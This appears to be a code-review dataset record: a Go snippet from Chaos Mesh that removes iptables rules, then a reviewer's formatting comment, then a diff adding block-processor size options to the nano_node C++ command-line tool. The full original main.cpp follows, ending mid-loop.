r.Get(ctx, types.NamespacedName{ Namespace: ns, Name: name, }, &pod) if err != nil { if !k8sError.IsNotFound(err) { return err } r.Log.Info("Pod not found", "namespace", ns, "name", name) networkchaos.Finalizers = utils.RemoveFromFinalizer(networkchaos.Finalizers, key) continue } var rule pb.Rule if networkchaos.Spec.Direction != v1alpha1.From { switch direction { case "output": set := r.generateSetName(networkchaos, targetIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_OUTPUT, set) case "input-": set := r.generateSetName(networkchaos, sourceIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_INPUT, set) } err = r.sendIPTables(ctx, &pod, rule, networkchaos) if err 
!= nil { r.Log.Error(err, "error while deleting iptables rules") return err } } if networkchaos.Spec.Direction != v1alpha1.To { switch direction { case "output": set := r.generateSetName(networkchaos, sourceIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_OUTPUT, set) case "input-": set := r.generateSetName(networkchaos, targetIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_INPUT, set) } err = r.sendIPTables(ctx, &pod, rule, networkchaos) if err != nil { r.Log.Error(err, "error while deleting iptables rules") return err } } networkchaos.Finalizers = utils.RemoveFromFinalizer(networkchaos.Finalizers, key) } r.Log.Info("after recovering", "finalizers", networkchaos.Finalizers) return nil } func (r *Reconciler) flushPodIPSet(ctx context.Context, pod *v1.Pod, ipset pb.IpSet, networkchaos *v1alpha1.NetworkChaos) error { c, err := utils.CreateGrpcConnection(ctx, r.Client, pod) if err != nil { return err } defer c.Close() pbClient := pb.NewChaosDaemonClient(c) if len(pod.Status.ContainerStatuses) == 0 { return fmt.Errorf("%s %s can't get the state of container", pod.Namespace, pod.Name) } containerID := pod.Status.ContainerStatuses[0].ContainerID _, err = pbClient.FlushIpSet(ctx, &pb.IpSetRequest{ Ipset: &ipset, ContainerId: containerID, }) return err } func (r *Reconciler) sendIPTables(ctx context.Context, pod *v1.Pod, rule pb.Rule, networkchaos *v1alpha1.NetworkChaos) error { c, err := utils.CreateGrpcConnection(ctx, r.Client, pod) if err != nil { return err } defer c.Close() pbClient := pb.NewChaosDaemonClient(c) if len(pod.Status.ContainerStatuses) == 0 { return fmt.Errorf("%s %s can't get the state of container", pod.Namespace, pod.Name) } containerID := pod.Status.ContainerStatuses[0].ContainerID _, err = pbClient.FlushIptables(ctx, &pb.IpTablesRequest{ Rule: &rule, ContainerId: containerID, }) return err }
1
13,040
This line should be formatted
chaos-mesh-chaos-mesh
go
@@ -32,6 +32,9 @@ int main (int argc, char * const * argv) ("disable_unchecked_drop", "Disables drop of unchecked table at startup") ("fast_bootstrap", "Increase bootstrap speed for high end nodes with higher limits") ("batch_size",boost::program_options::value<std::size_t> (), "Increase sideband batch size, default 512") + ("block_processor_batch_size",boost::program_options::value<std::size_t> (), "Increase block processor transaction batch write size, default 0 (limited by config block_processor_batch_max_time)") + ("block_processor_full_size",boost::program_options::value<std::size_t> (), "Increase block processor allowed blocks queue size before dropping live network packets and holding bootstrap download, default 65536") + ("block_processor_verification_size",boost::program_options::value<std::size_t> (), "Increase batch signature verification size in block processor, default 0 (2048 * signature checker threads + 1)") ("debug_block_count", "Display the number of block") ("debug_bootstrap_generate", "Generate bootstrap sequence of blocks") ("debug_dump_online_weight", "Dump online_weights table")
1
#include <nano/lib/utility.hpp> #include <nano/nano_node/daemon.hpp> #include <nano/node/cli.hpp> #include <nano/node/node.hpp> #include <nano/node/rpc.hpp> #include <nano/node/testing.hpp> #include <sstream> #include <argon2.h> #include <boost/lexical_cast.hpp> #include <boost/program_options.hpp> int main (int argc, char * const * argv) { nano::set_umask (); boost::program_options::options_description description ("Command line options"); nano::add_node_options (description); // clang-format off description.add_options () ("help", "Print out options") ("version", "Prints out version") ("daemon", "Start node daemon") ("disable_backup", "Disable wallet automatic backups") ("disable_lazy_bootstrap", "Disables lazy bootstrap") ("disable_legacy_bootstrap", "Disables legacy bootstrap") ("disable_wallet_bootstrap", "Disables wallet lazy bootstrap") ("disable_bootstrap_listener", "Disables bootstrap listener (incoming connections)") ("disable_unchecked_cleanup", "Disables periodic cleanup of old records from unchecked table") ("disable_unchecked_drop", "Disables drop of unchecked table at startup") ("fast_bootstrap", "Increase bootstrap speed for high end nodes with higher limits") ("batch_size",boost::program_options::value<std::size_t> (), "Increase sideband batch size, default 512") ("debug_block_count", "Display the number of block") ("debug_bootstrap_generate", "Generate bootstrap sequence of blocks") ("debug_dump_online_weight", "Dump online_weights table") ("debug_dump_representatives", "List representatives and weights") ("debug_account_count", "Display the number of accounts") ("debug_mass_activity", "Generates fake debug activity") ("debug_profile_generate", "Profile work generation") ("debug_opencl", "OpenCL work generation") ("debug_profile_verify", "Profile work verification") ("debug_profile_kdf", "Profile kdf function") ("debug_verify_profile", "Profile signature verification") ("debug_verify_profile_batch", "Profile batch signature verification") 
("debug_profile_bootstrap", "Profile bootstrap style blocks processing (at least 10GB of free storage space required)") ("debug_profile_sign", "Profile signature generation") ("debug_profile_process", "Profile active blocks processing (only for nano_test_network)") ("debug_profile_votes", "Profile votes processing (only for nano_test_network)") ("debug_random_feed", "Generates output to RNG test suites") ("debug_rpc", "Read an RPC command from stdin and invoke it. Network operations will have no effect.") ("debug_validate_blocks", "Check all blocks for correct hash, signature, work value") ("debug_peers", "Display peer IPv6:port connections") ("platform", boost::program_options::value<std::string> (), "Defines the <platform> for OpenCL commands") ("device", boost::program_options::value<std::string> (), "Defines <device> for OpenCL command") ("threads", boost::program_options::value<std::string> (), "Defines <threads> count for OpenCL command") ("difficulty", boost::program_options::value<std::string> (), "Defines <difficulty> for OpenCL command, HEX"); // clang-format on boost::program_options::variables_map vm; try { boost::program_options::store (boost::program_options::parse_command_line (argc, argv, description), vm); } catch (boost::program_options::error const & err) { std::cerr << err.what () << std::endl; return 1; } boost::program_options::notify (vm); int result (0); auto network (vm.find ("network")); if (network != vm.end ()) { auto err (nano::network_params::set_active_network (network->second.as<std::string> ())); if (err) { std::cerr << err.get_message () << std::endl; std::exit (1); } } auto data_path_it = vm.find ("data_path"); if (data_path_it == vm.end ()) { std::string error_string; if (!nano::migrate_working_path (error_string)) { std::cerr << error_string << std::endl; return 1; } } boost::filesystem::path data_path ((data_path_it != vm.end ()) ? 
data_path_it->second.as<std::string> () : nano::working_path ()); auto ec = nano::handle_node_options (vm); if (ec == nano::error_cli::unknown_command) { if (vm.count ("daemon") > 0) { nano_daemon::daemon daemon; nano::node_flags flags; auto batch_size_it = vm.find ("batch_size"); if (batch_size_it != vm.end ()) { flags.sideband_batch_size = batch_size_it->second.as<size_t> (); } flags.disable_backup = (vm.count ("disable_backup") > 0); flags.disable_lazy_bootstrap = (vm.count ("disable_lazy_bootstrap") > 0); flags.disable_legacy_bootstrap = (vm.count ("disable_legacy_bootstrap") > 0); flags.disable_wallet_bootstrap = (vm.count ("disable_wallet_bootstrap") > 0); flags.disable_bootstrap_listener = (vm.count ("disable_bootstrap_listener") > 0); flags.disable_unchecked_cleanup = (vm.count ("disable_unchecked_cleanup") > 0); flags.disable_unchecked_drop = (vm.count ("disable_unchecked_drop") > 0); flags.fast_bootstrap = (vm.count ("fast_bootstrap") > 0); daemon.run (data_path, flags); } else if (vm.count ("debug_block_count")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cout << boost::str (boost::format ("Block count: %1%\n") % node.node->store.block_count (transaction).sum ()); } else if (vm.count ("debug_bootstrap_generate")) { auto key_it = vm.find ("key"); if (key_it != vm.end ()) { nano::uint256_union key; if (!key.decode_hex (key_it->second.as<std::string> ())) { nano::keypair genesis (key.to_string ()); nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); std::cout << "Genesis: " << genesis.prv.data.to_string () << "\n" << "Public: " << genesis.pub.to_string () << "\n" << "Account: " << genesis.pub.to_account () << "\n"; nano::keypair landing; std::cout << "Landing: " << landing.prv.data.to_string () << "\n" << "Public: " << landing.pub.to_string () << "\n" << "Account: " << landing.pub.to_account () << "\n"; for (auto i (0); i != 32; ++i) { nano::keypair rep; std::cout << "Rep" << i << ": " << 
rep.prv.data.to_string () << "\n" << "Public: " << rep.pub.to_string () << "\n" << "Account: " << rep.pub.to_account () << "\n"; } nano::uint128_t balance (std::numeric_limits<nano::uint128_t>::max ()); nano::open_block genesis_block (genesis.pub, genesis.pub, genesis.pub, genesis.prv, genesis.pub, work.generate (genesis.pub)); std::cout << genesis_block.to_json (); std::cout.flush (); nano::block_hash previous (genesis_block.hash ()); for (auto i (0); i != 8; ++i) { nano::uint128_t yearly_distribution (nano::uint128_t (1) << (127 - (i == 7 ? 6 : i))); auto weekly_distribution (yearly_distribution / 52); for (auto j (0); j != 52; ++j) { assert (balance > weekly_distribution); balance = balance < (weekly_distribution * 2) ? 0 : balance - weekly_distribution; nano::send_block send (previous, landing.pub, balance, genesis.prv, genesis.pub, work.generate (previous)); previous = send.hash (); std::cout << send.to_json (); std::cout.flush (); } } } else { std::cerr << "Invalid key\n"; result = -1; } } else { std::cerr << "Bootstrapping requires one <key> option\n"; result = -1; } } else if (vm.count ("debug_dump_online_weight")) { nano::inactive_node node (data_path); auto current (node.node->online_reps.online_stake ()); std::cout << boost::str (boost::format ("Online Weight %1%\n") % current); auto transaction (node.node->store.tx_begin_read ()); for (auto i (node.node->store.online_weight_begin (transaction)), n (node.node->store.online_weight_end ()); i != n; ++i) { using time_point = std::chrono::system_clock::time_point; time_point ts (std::chrono::duration_cast<time_point::duration> (std::chrono::nanoseconds (i->first))); std::time_t timestamp = std::chrono::system_clock::to_time_t (ts); std::string weight; i->second.encode_dec (weight); std::cout << boost::str (boost::format ("Timestamp %1% Weight %2%\n") % ctime (&timestamp) % weight); } } else if (vm.count ("debug_dump_representatives")) { nano::inactive_node node (data_path); auto transaction 
(node.node->store.tx_begin ()); nano::uint128_t total; for (auto i (node.node->store.representation_begin (transaction)), n (node.node->store.representation_end ()); i != n; ++i) { nano::account account (i->first); auto amount (node.node->store.representation_get (transaction, account)); total += amount; std::cout << boost::str (boost::format ("%1% %2% %3%\n") % account.to_account () % amount.convert_to<std::string> () % total.convert_to<std::string> ()); } std::map<nano::account, nano::uint128_t> calculated; for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { nano::account_info info (i->second); nano::block_hash rep_block (node.node->ledger.representative_calculated (transaction, info.head)); auto block (node.node->store.block_get (transaction, rep_block)); calculated[block->representative ()] += info.balance.number (); } total = 0; for (auto i (calculated.begin ()), n (calculated.end ()); i != n; ++i) { total += i->second; std::cout << boost::str (boost::format ("%1% %2% %3%\n") % i->first.to_account () % i->second.convert_to<std::string> () % total.convert_to<std::string> ()); } } else if (vm.count ("debug_account_count")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cout << boost::str (boost::format ("Frontier count: %1%\n") % node.node->store.account_count (transaction)); } else if (vm.count ("debug_mass_activity")) { nano::system system (24000, 1); uint32_t count (1000000); system.generate_mass_activity (count, *system.nodes[0]); } else if (vm.count ("debug_profile_kdf")) { nano::network_params network_params; nano::uint256_union result; nano::uint256_union salt (0); std::string password (""); while (true) { auto begin1 (std::chrono::high_resolution_clock::now ()); auto success (argon2_hash (1, network_params.kdf_work, 1, password.data (), password.size (), salt.bytes.data (), salt.bytes.size (), result.bytes.data (), result.bytes.size (), NULL, 0, 
Argon2_d, 0x10)); (void)success; auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("Derivation time: %1%us\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_profile_generate")) { nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << "Starting generation profiling\n"; while (true) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); block.block_work_set (work.generate (block.root ())); auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_opencl")) { nano::network_params network_params; bool error (false); nano::opencl_environment environment (error); if (!error) { unsigned short platform (0); auto platform_it = vm.find ("platform"); if (platform_it != vm.end ()) { try { platform = boost::lexical_cast<unsigned short> (platform_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid platform id\n"; result = -1; } } unsigned short device (0); auto device_it = vm.find ("device"); if (device_it != vm.end ()) { try { device = boost::lexical_cast<unsigned short> (device_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid device id\n"; result = -1; } } unsigned threads (1024 * 1024); auto threads_it = vm.find ("threads"); if (threads_it != vm.end ()) { try { threads = boost::lexical_cast<unsigned> (threads_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid threads count\n"; result = -1; } } uint64_t difficulty (network_params.publish_threshold); auto difficulty_it = vm.find ("difficulty"); if (difficulty_it != vm.end ()) { if 
(nano::from_string_hex (difficulty_it->second.as<std::string> (), difficulty)) { std::cerr << "Invalid difficulty\n"; result = -1; } } if (!result) { error |= platform >= environment.platforms.size (); if (!error) { error |= device >= environment.platforms[platform].devices.size (); if (!error) { nano::logging logging; auto opencl (nano::opencl_work::create (true, { platform, device, threads }, logging)); nano::work_pool work_pool (std::numeric_limits<unsigned>::max (), opencl ? [&opencl](nano::uint256_union const & root_a, uint64_t difficulty_a) { return opencl->generate_work (root_a, difficulty_a); } : std::function<boost::optional<uint64_t> (nano::uint256_union const &, uint64_t)> (nullptr)); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << boost::str (boost::format ("Starting OpenCL generation profiling. Platform: %1%. Device: %2%. Threads: %3%. Difficulty: %4$#x\n") % platform % device % threads % difficulty); for (uint64_t i (0); true; ++i) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); block.block_work_set (work_pool.generate (block.root (), difficulty)); auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else { std::cout << "Not available device id\n" << std::endl; result = -1; } } else { std::cout << "Not available platform id\n" << std::endl; result = -1; } } } else { std::cout << "Error initializing OpenCL" << std::endl; result = -1; } } else if (vm.count ("debug_profile_verify")) { nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << "Starting verification profiling\n"; while (true) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); for (uint64_t t (0); t < 1000000; ++t) { 
block.hashables.previous.qwords[0] += 1; block.block_work_set (t); nano::work_validate (block); } auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_verify_profile")) { nano::keypair key; nano::uint256_union message; nano::uint512_union signature; signature = nano::sign_message (key.prv, key.pub, message); auto begin (std::chrono::high_resolution_clock::now ()); for (auto i (0u); i < 1000; ++i) { nano::validate_message (key.pub, message, signature); } auto end (std::chrono::high_resolution_clock::now ()); std::cerr << "Signature verifications " << std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count () << std::endl; } else if (vm.count ("debug_verify_profile_batch")) { nano::keypair key; size_t batch_count (1000); nano::uint256_union message; nano::uint512_union signature (nano::sign_message (key.prv, key.pub, message)); std::vector<unsigned char const *> messages (batch_count, message.bytes.data ()); std::vector<size_t> lengths (batch_count, sizeof (message)); std::vector<unsigned char const *> pub_keys (batch_count, key.pub.bytes.data ()); std::vector<unsigned char const *> signatures (batch_count, signature.bytes.data ()); std::vector<int> verifications; verifications.resize (batch_count); auto begin (std::chrono::high_resolution_clock::now ()); nano::validate_message_batch (messages.data (), lengths.data (), pub_keys.data (), signatures.data (), batch_count, verifications.data ()); auto end (std::chrono::high_resolution_clock::now ()); std::cerr << "Batch signature verifications " << std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count () << std::endl; } else if (vm.count ("debug_profile_sign")) { std::cerr << "Starting blocks signing profiling\n"; while (true) { nano::keypair key; nano::block_hash latest (0); auto begin1 
(std::chrono::high_resolution_clock::now ()); for (uint64_t balance (0); balance < 1000; ++balance) { nano::send_block send (latest, key.pub, balance, key.prv, key.pub, 0); latest = send.hash (); } auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_profile_process")) { nano::network_params::set_active_network (nano::nano_networks::nano_test_network); nano::network_params test_params; nano::block_builder builder; size_t num_accounts (100000); size_t num_interations (5); // 100,000 * 5 * 2 = 1,000,000 blocks size_t max_blocks (2 * num_accounts * num_interations + num_accounts * 2); // 1,000,000 + 2* 100,000 = 1,200,000 blocks std::cerr << boost::str (boost::format ("Starting pregenerating %1% blocks\n") % max_blocks); nano::system system (24000, 1); nano::node_init init; nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::logging logging; auto path (nano::unique_path ()); logging.init (path); auto node (std::make_shared<nano::node> (init, system.io_ctx, 24001, path, system.alarm, logging, work)); nano::block_hash genesis_latest (node->latest (test_params.ledger.test_genesis_key.pub)); nano::uint128_t genesis_balance (std::numeric_limits<nano::uint128_t>::max ()); // Generating keys std::vector<nano::keypair> keys (num_accounts); std::vector<nano::block_hash> frontiers (num_accounts); std::vector<nano::uint128_t> balances (num_accounts, 1000000000); // Generating blocks std::deque<std::shared_ptr<nano::block>> blocks; for (auto i (0); i != num_accounts; ++i) { genesis_balance = genesis_balance - 1000000000; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (keys[i].pub) .sign (keys[i].prv, keys[i].pub) .work (work.generate 
(genesis_latest)) .build (); genesis_latest = send->hash (); blocks.push_back (std::move (send)); auto open = builder.state () .account (keys[i].pub) .previous (0) .representative (keys[i].pub) .balance (balances[i]) .link (genesis_latest) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (keys[i].pub)) .build (); frontiers[i] = open->hash (); blocks.push_back (std::move (open)); } for (auto i (0); i != num_interations; ++i) { for (auto j (0); j != num_accounts; ++j) { size_t other (num_accounts - j - 1); // Sending to other account --balances[j]; auto send = builder.state () .account (keys[j].pub) .previous (frontiers[j]) .representative (keys[j].pub) .balance (balances[j]) .link (keys[other].pub) .sign (keys[j].prv, keys[j].pub) .work (work.generate (frontiers[j])) .build (); frontiers[j] = send->hash (); blocks.push_back (std::move (send)); // Receiving ++balances[other]; auto receive = builder.state () .account (keys[other].pub) .previous (frontiers[other]) .representative (keys[other].pub) .balance (balances[other]) .link (frontiers[j]) .sign (keys[other].prv, keys[other].pub) .work (work.generate (frontiers[other])) .build (); frontiers[other] = receive->hash (); blocks.push_back (std::move (receive)); } } // Processing blocks std::cerr << boost::str (boost::format ("Starting processing %1% active blocks\n") % max_blocks); auto begin (std::chrono::high_resolution_clock::now ()); while (!blocks.empty ()) { auto block (blocks.front ()); node->process_active (block); blocks.pop_front (); } uint64_t block_count (0); while (block_count < max_blocks + 1) { std::this_thread::sleep_for (std::chrono::milliseconds (100)); auto transaction (node->store.tx_begin ()); block_count = node->store.block_count (transaction).sum (); } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); node->stop (); std::cerr << boost::str 
(boost::format ("%|1$ 12d| us \n%2% blocks per second\n") % time % (max_blocks * 1000000 / time)); } else if (vm.count ("debug_profile_votes")) { nano::network_params::set_active_network (nano::nano_networks::nano_test_network); nano::network_params test_params; nano::block_builder builder; size_t num_elections (40000); size_t num_representatives (25); size_t max_votes (num_elections * num_representatives); // 40,000 * 25 = 1,000,000 votes std::cerr << boost::str (boost::format ("Starting pregenerating %1% votes\n") % max_votes); nano::system system (24000, 1); nano::node_init init; nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::logging logging; auto path (nano::unique_path ()); logging.init (path); auto node (std::make_shared<nano::node> (init, system.io_ctx, 24001, path, system.alarm, logging, work)); nano::block_hash genesis_latest (node->latest (test_params.ledger.test_genesis_key.pub)); nano::uint128_t genesis_balance (std::numeric_limits<nano::uint128_t>::max ()); // Generating keys std::vector<nano::keypair> keys (num_representatives); nano::uint128_t balance ((node->config.online_weight_minimum.number () / num_representatives) + 1); for (auto i (0); i != num_representatives; ++i) { auto transaction (node->store.tx_begin_write ()); genesis_balance = genesis_balance - balance; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (keys[i].pub) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (genesis_latest)) .build (); genesis_latest = send->hash (); node->ledger.process (transaction, *send); auto open = builder.state () .account (keys[i].pub) .previous (0) .representative (keys[i].pub) .balance (balance) .link (genesis_latest) .sign (keys[i].prv, keys[i].pub) .work (work.generate (keys[i].pub)) .build (); node->ledger.process 
(transaction, *open); } // Generating blocks std::deque<std::shared_ptr<nano::block>> blocks; for (auto i (0); i != num_elections; ++i) { genesis_balance = genesis_balance - 1; nano::keypair destination; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (destination.pub) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (genesis_latest)) .build (); genesis_latest = send->hash (); blocks.push_back (std::move (send)); } // Generating votes std::deque<std::shared_ptr<nano::vote>> votes; for (auto j (0); j != num_representatives; ++j) { uint64_t sequence (1); for (auto & i : blocks) { auto vote (std::make_shared<nano::vote> (keys[j].pub, keys[j].prv, sequence, std::vector<nano::block_hash> (1, i->hash ()))); votes.push_back (vote); sequence++; } } // Processing block & start elections while (!blocks.empty ()) { auto block (blocks.front ()); node->process_active (block); blocks.pop_front (); } node->block_processor.flush (); // Processing votes std::cerr << boost::str (boost::format ("Starting processing %1% votes\n") % max_votes); auto begin (std::chrono::high_resolution_clock::now ()); while (!votes.empty ()) { auto vote (votes.front ()); node->vote_processor.vote (vote, node->network.endpoint ()); votes.pop_front (); } while (!node->active.empty ()) { std::this_thread::sleep_for (std::chrono::milliseconds (100)); } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); node->stop (); std::cerr << boost::str (boost::format ("%|1$ 12d| us \n%2% votes per second\n") % time % (max_votes * 1000000 / time)); } else if (vm.count ("debug_random_feed")) { /* * This command redirects an infinite stream of bytes from the random pool to standard out. 
* The result can be fed into various tools for testing RNGs and entropy pools. * * Example, running the entire dieharder test suite: * * ./nano_node --debug_random_feed | dieharder -a -g 200 */ nano::raw_key seed; for (;;) { nano::random_pool::generate_block (seed.data.bytes.data (), seed.data.bytes.size ()); std::cout.write (reinterpret_cast<const char *> (seed.data.bytes.data ()), seed.data.bytes.size ()); } } else if (vm.count ("debug_rpc")) { std::string rpc_input_l; std::ostringstream command_l; while (std::cin >> rpc_input_l) { command_l << rpc_input_l; } auto response_handler_l ([](boost::property_tree::ptree const & tree_a) { boost::property_tree::write_json (std::cout, tree_a); // Terminate as soon as we have the result, even if background threads (like work generation) are running. std::exit (0); }); nano::inactive_node inactive_node_l (data_path); nano::rpc_config rpc_config_l; rpc_config_l.enable_control = true; std::unique_ptr<nano::rpc> rpc_l = get_rpc (inactive_node_l.node->io_ctx, *inactive_node_l.node, rpc_config_l); std::string req_id_l ("1"); nano::rpc_handler handler_l (*inactive_node_l.node, *rpc_l, command_l.str (), req_id_l, response_handler_l); handler_l.process_request (); } else if (vm.count ("debug_validate_blocks")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cerr << boost::str (boost::format ("Performing blocks hash, signature, work validation...\n")); size_t count (0); for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { ++count; if ((count % 20000) == 0) { std::cout << boost::str (boost::format ("%1% accounts validated\n") % count); } nano::account_info info (i->second); nano::account account (i->first); auto hash (info.open_block); nano::block_hash calculated_hash (0); nano::block_sideband sideband; uint64_t height (0); uint64_t previous_timestamp (0); while (!hash.is_zero ()) { // Retrieving block data auto block 
(node.node->store.block_get (transaction, hash, &sideband)); // Check for state & open blocks if account field is correct if (block->type () == nano::block_type::open || block->type () == nano::block_type::state) { if (block->account () != account) { std::cerr << boost::str (boost::format ("Incorrect account field for block %1%\n") % hash.to_string ()); } } // Check if sideband account is correct else if (sideband.account != account) { std::cerr << boost::str (boost::format ("Incorrect sideband account for block %1%\n") % hash.to_string ()); } // Check if previous field is correct if (calculated_hash != block->previous ()) { std::cerr << boost::str (boost::format ("Incorrect previous field for block %1%\n") % hash.to_string ()); } // Check if block data is correct (calculating hash) calculated_hash = block->hash (); if (calculated_hash != hash) { std::cerr << boost::str (boost::format ("Invalid data inside block %1% calculated hash: %2%\n") % hash.to_string () % calculated_hash.to_string ()); } // Check if block signature is correct if (validate_message (account, hash, block->block_signature ())) { bool invalid (true); // Epoch blocks if (!node.node->ledger.epoch_link.is_zero () && block->type () == nano::block_type::state) { auto & state_block (static_cast<nano::state_block &> (*block.get ())); nano::amount prev_balance (0); if (!state_block.hashables.previous.is_zero ()) { prev_balance = node.node->ledger.balance (transaction, state_block.hashables.previous); } if (node.node->ledger.is_epoch_link (state_block.hashables.link) && state_block.hashables.balance == prev_balance) { invalid = validate_message (node.node->ledger.epoch_signer, hash, block->block_signature ()); } } if (invalid) { std::cerr << boost::str (boost::format ("Invalid signature for block %1%\n") % hash.to_string ()); } } // Check if block work value is correct if (nano::work_validate (*block.get ())) { std::cerr << boost::str (boost::format ("Invalid work for block %1% value: %2%\n") % 
hash.to_string () % nano::to_string_hex (block->block_work ())); } // Check if sideband height is correct ++height; if (sideband.height != height) { std::cerr << boost::str (boost::format ("Incorrect sideband height for block %1%. Sideband: %2%. Expected: %3%\n") % hash.to_string () % sideband.height % height); } // Check if sideband timestamp is after previous timestamp if (sideband.timestamp < previous_timestamp) { std::cerr << boost::str (boost::format ("Incorrect sideband timestamp for block %1%\n") % hash.to_string ()); } previous_timestamp = sideband.timestamp; // Retrieving successor block hash hash = node.node->store.block_successor (transaction, hash); } if (info.block_count != height) { std::cerr << boost::str (boost::format ("Incorrect block count for account %1%. Actual: %2%. Expected: %3%\n") % account.to_account () % height % info.block_count); } if (info.head != calculated_hash) { std::cerr << boost::str (boost::format ("Incorrect frontier for account %1%. Actual: %2%. Expected: %3%\n") % account.to_account () % calculated_hash.to_string () % info.head.to_string ()); } } std::cout << boost::str (boost::format ("%1% accounts validated\n") % count); count = 0; for (auto i (node.node->store.pending_begin (transaction)), n (node.node->store.pending_end ()); i != n; ++i) { ++count; if ((count % 50000) == 0) { std::cout << boost::str (boost::format ("%1% pending blocks validated\n") % count); } nano::pending_key key (i->first); nano::pending_info info (i->second); // Check block existance auto block (node.node->store.block_get (transaction, key.hash)); if (block == nullptr) { std::cerr << boost::str (boost::format ("Pending block not existing %1%\n") % key.hash.to_string ()); } else { // Check if pending destination is correct nano::account destination (0); if (auto state = dynamic_cast<nano::state_block *> (block.get ())) { if (node.node->ledger.is_send (transaction, *state)) { destination = state->hashables.link; } } else if (auto send = 
dynamic_cast<nano::send_block *> (block.get ())) { destination = send->hashables.destination; } else { std::cerr << boost::str (boost::format ("Incorrect type for pending block %1%\n") % key.hash.to_string ()); } if (key.account != destination) { std::cerr << boost::str (boost::format ("Incorrect destination for pending block %1%\n") % key.hash.to_string ()); } // Check if pending source is correct auto account (node.node->ledger.account (transaction, key.hash)); if (info.source != account) { std::cerr << boost::str (boost::format ("Incorrect source for pending block %1%\n") % key.hash.to_string ()); } // Check if pending amount is correct auto amount (node.node->ledger.amount (transaction, key.hash)); if (info.amount != amount) { std::cerr << boost::str (boost::format ("Incorrect amount for pending block %1%\n") % key.hash.to_string ()); } } } std::cout << boost::str (boost::format ("%1% pending blocks validated\n") % count); } else if (vm.count ("debug_profile_bootstrap")) { nano::inactive_node node2 (nano::unique_path (), 24001); node2.node->flags.fast_bootstrap = (vm.count ("fast_bootstrap") > 0); nano::genesis genesis; auto begin (std::chrono::high_resolution_clock::now ()); uint64_t block_count (0); size_t count (0); { nano::inactive_node node (data_path, 24000); auto transaction (node.node->store.tx_begin ()); block_count = node.node->store.block_count (transaction).sum (); std::cout << boost::str (boost::format ("Performing bootstrap emulation, %1% blocks in ledger...") % block_count) << std::endl; for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { nano::account account (i->first); nano::account_info info (i->second); auto hash (info.head); while (!hash.is_zero ()) { // Retrieving block data auto block (node.node->store.block_get (transaction, hash)); if (block != nullptr) { ++count; if ((count % 100000) == 0) { std::cout << boost::str (boost::format ("%1% blocks retrieved") % count) << std::endl; } 
